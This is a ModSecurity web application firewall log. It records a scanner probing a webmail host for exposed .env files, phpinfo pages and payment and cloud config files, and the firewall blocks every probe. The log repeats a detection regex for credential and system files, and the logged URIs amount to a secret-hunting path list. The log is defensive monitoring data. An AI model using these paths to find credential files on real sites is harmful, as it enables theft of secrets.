[Tue May 26 13:32:23.156502 2026] [security2:error] [pid 512344:tid 512480] [client 45.148.10.95:7446] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/BACKEND/.env"] [unique_id "ahVTj8bElyei4S77DQcNUAAAAAY"]
[Tue May 26 13:32:23.158396 2026] [security2:error] [pid 512745:tid 512905] [client 45.148.10.95:7462] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/BE/.env"] [unique_id "ahVTj3KSB_s2CvZg7xN4tQAAASg"]
[Tue May 26 13:32:23.170298 2026] [security2:error] [pid 512745:tid 512904] [client 45.148.10.95:7416] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/Be/.env"] [unique_id "ahVTj3KSB_s2CvZg7xN4tgAAASc"]
[Tue May 26 13:32:23.171483 2026] [security2:error] [pid 512745:tid 512995] [client 45.148.10.95:7468] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/Backend/.env"] [unique_id "ahVTj3KSB_s2CvZg7xN4twAAAYI"]
[Tue May 26 13:32:23.283141 2026] [security2:error] [pid 512745:tid 512766] [remote 216.73.217.110:39970] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 110.217.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rainadelproperties.com"] [uri "/online.php"] [unique_id "ahVTj3KSB_s2CvZg7xN4vQABNhQ"]
[Tue May 26 13:32:23.433928 2026] [security2:error] [pid 512745:tid 512922] [client 45.148.10.95:7338] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/_profiler/phpinfo.php"] [unique_id "ahVTj3KSB_s2CvZg7xN4xgAAATk"]
[Tue May 26 13:32:23.491165 2026] [security2:error] [pid 512344:tid 512489] [client 45.148.10.95:7352] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/admin-app/.env"] [unique_id "ahVTj8bElyei4S77DQcNbQAAAA8"]
[Tue May 26 13:32:23.589135 2026] [security2:error] [pid 512344:tid 512577] [client 45.148.10.95:7456] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/admin/phpinfo.php"] [unique_id "ahVTj8bElyei4S77DQcNdgAAAGc"]
[Tue May 26 13:32:23.593176 2026] [security2:error] [pid 512745:tid 512977] [client 45.148.10.95:7462] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/admin_phpinfo.php"] [unique_id "ahVTj3KSB_s2CvZg7xN40gAAAXA"]
[Tue May 26 13:32:23.616534 2026] [security2:error] [pid 512745:tid 512908] [client 45.148.10.95:7468] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/administrator/.env"] [unique_id "ahVTj3KSB_s2CvZg7xN40wAAASs"]
[Tue May 26 13:32:23.623113 2026] [security2:error] [pid 512344:tid 512527] [client 45.148.10.95:7352] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/api-backend/.env"] [unique_id "ahVTj8bElyei4S77DQcNeAAAADU"]
[Tue May 26 13:32:23.635308 2026] [security2:error] [pid 512745:tid 512949] [client 45.148.10.95:7354] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/api-node/.env"] [unique_id "ahVTj3KSB_s2CvZg7xN41QAAAVQ"]
[Tue May 26 13:32:23.654308 2026] [security2:error] [pid 512344:tid 512582] [client 45.148.10.95:7494] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/api/.env"] [unique_id "ahVTj8bElyei4S77DQcNegAAAGw"]
[Tue May 26 13:32:23.698556 2026] [security2:error] [pid 512344:tid 512554] [client 14.183.8.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTj8bElyei4S77DQcNVwAAAFA"]
[Tue May 26 13:32:23.752235 2026] [security2:error] [pid 512344:tid 512587] [client 45.148.10.95:7352] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/api/info.php"] [unique_id "ahVTj8bElyei4S77DQcNggAAAHE"]
[Tue May 26 13:32:23.856672 2026] [security2:error] [pid 512745:tid 512889] [client 45.148.10.95:7380] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/api/phpinfo.php"] [unique_id "ahVTj3KSB_s2CvZg7xN44wAAARg"]
[Tue May 26 13:32:23.909686 2026] [security2:error] [pid 512745:tid 512976] [client 45.148.10.95:7418] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/apis/.env"] [unique_id "ahVTj3KSB_s2CvZg7xN46AAAAW8"]
[Tue May 26 13:32:23.997462 2026] [security2:error] [pid 512344:tid 512564] [client 45.148.10.95:7368] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/app/.env"] [unique_id "ahVTj8bElyei4S77DQcNkwAAAFo"]
[Tue May 26 13:32:24.151227 2026] [security2:error] [pid 512745:tid 512894] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTj3KSB_s2CvZg7xN42QAAAR0"]
[Tue May 26 13:32:24.180933 2026] [security2:error] [pid 512745:tid 512994] [client 45.148.10.95:7468] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/application/.env"] [unique_id "ahVTkHKSB_s2CvZg7xN4_AAAAYE"]
[Tue May 26 13:32:24.196634 2026] [security2:error] [pid 512344:tid 512594] [client 45.148.10.95:7592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/apps/.env"] [unique_id "ahVTkMbElyei4S77DQcNoQAAAHg"]
[Tue May 26 13:32:24.440231 2026] [security2:error] [pid 512344:tid 512540] [client 45.148.10.95:7554] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/back-api/.env"] [unique_id "ahVTkMbElyei4S77DQcNswAAAEI"]
[Tue May 26 13:32:24.447836 2026] [security2:error] [pid 512745:tid 512929] [client 45.148.10.95:7480] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/back-end/.env"] [unique_id "ahVTkHKSB_s2CvZg7xN5DAAAAUA"]
[Tue May 26 13:32:24.450264 2026] [security2:error] [pid 512745:tid 512915] [client 45.148.10.95:7468] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/back/.env"] [unique_id "ahVTkHKSB_s2CvZg7xN5DQAAATI"]
[Tue May 26 13:32:24.468391 2026] [security2:error] [pid 512344:tid 512511] [client 45.148.10.95:7592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/backend-api/.env"] [unique_id "ahVTkMbElyei4S77DQcNtAAAACU"]
[Tue May 26 13:32:24.469634 2026] [security2:error] [pid 512745:tid 512997] [client 45.148.10.95:7354] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/backend/.env"] [unique_id "ahVTkHKSB_s2CvZg7xN5DgAAAYQ"]
[Tue May 26 13:32:24.575702 2026] [security2:error] [pid 512344:tid 512567] [client 45.148.10.95:7554] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/be/.env"] [unique_id "ahVTkMbElyei4S77DQcNvQAAAF0"]
[Tue May 26 13:32:24.577435 2026] [security2:error] [pid 512745:tid 512900] [client 45.148.10.95:7468] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/beta/.env"] [unique_id "ahVTkHKSB_s2CvZg7xN5GQAAASM"]
[Tue May 26 13:32:24.577718 2026] [security2:error] [pid 512745:tid 512968] [client 45.148.10.95:7480] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/backup/.env"] [unique_id "ahVTkHKSB_s2CvZg7xN5GAAAAWc"]
[Tue May 26 13:32:24.669233 2026] [security2:error] [pid 512344:tid 512545] [client 45.148.10.95:7494] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/client/.env"] [unique_id "ahVTkMbElyei4S77DQcNwgAAAEc"]
[Tue May 26 13:32:24.693885 2026] [security2:error] [pid 512344:tid 512513] [client 45.148.10.95:7368] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/cms/.env"] [unique_id "ahVTkMbElyei4S77DQcNxAAAACc"]
[Tue May 26 13:32:24.738241 2026] [security2:error] [pid 512344:tid 512501] [client 45.148.10.95:7592] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/config.php"] [unique_id "ahVTkMbElyei4S77DQcNyAAAABs"]
[Tue May 26 13:32:24.800023 2026] [security2:error] [pid 512344:tid 512543] [client 45.148.10.95:7494] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/config/.env"] [unique_id "ahVTkMbElyei4S77DQcNzAAAAEU"]
[Tue May 26 13:32:24.832652 2026] [security2:error] [pid 512344:tid 512591] [client 45.148.10.95:7616] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/config/aws.php"] [unique_id "ahVTkMbElyei4S77DQcN0QAAAHU"]
[Tue May 26 13:32:24.859868 2026] [security2:error] [pid 512745:tid 512898] [client 45.148.10.95:7480] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/config/config.inc.php"] [unique_id "ahVTkHKSB_s2CvZg7xN5LAAAASE"]
[Tue May 26 13:32:24.906049 2026] [security2:error] [pid 512344:tid 512592] [client 45.148.10.95:7502] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/config/config.php"] [unique_id "ahVTkMbElyei4S77DQcN0wAAAHY"]
[Tue May 26 13:32:24.936428 2026] [security2:error] [pid 512745:tid 512918] [client 45.148.10.95:7602] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/config/env.php"] [unique_id "ahVTkHKSB_s2CvZg7xN5MwAAATU"]
[Tue May 26 13:32:24.957670 2026] [security2:error] [pid 512344:tid 512596] [client 45.148.10.95:7432] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/config/module.config.php"] [unique_id "ahVTkMbElyei4S77DQcN2AAAAHo"]
[Tue May 26 13:32:24.965494 2026] [security2:error] [pid 512344:tid 512519] [client 45.148.10.95:7538] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/config/nexmo.php"] [unique_id "ahVTkMbElyei4S77DQcN2QAAAC0"]
[Tue May 26 13:32:24.977121 2026] [security2:error] [pid 512745:tid 512768] [remote 163.223.13.54:51748] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 54.13.223.163.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "hassina-foundation.com"] [uri "/wp-login.php"] [unique_id "ahVTkHKSB_s2CvZg7xN5KAABiBY"]
[Tue May 26 13:32:25.015228 2026] [security2:error] [pid 512745:tid 512927] [client 45.148.10.95:7354] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/config/stripe.php"] [unique_id "ahVTkXKSB_s2CvZg7xN5OwAAAT4"]
[Tue May 26 13:32:25.219211 2026] [security2:error] [pid 512344:tid 512534] [client 45.148.10.95:7494] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/crm/.env"] [unique_id "ahVTkcbElyei4S77DQcN6wAAADw"]
[Tue May 26 13:32:25.239582 2026] [security2:error] [pid 512745:tid 512926] [client 45.148.10.95:7578] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/cron/.env"] [unique_id "ahVTkXKSB_s2CvZg7xN5TQAAAT0"]
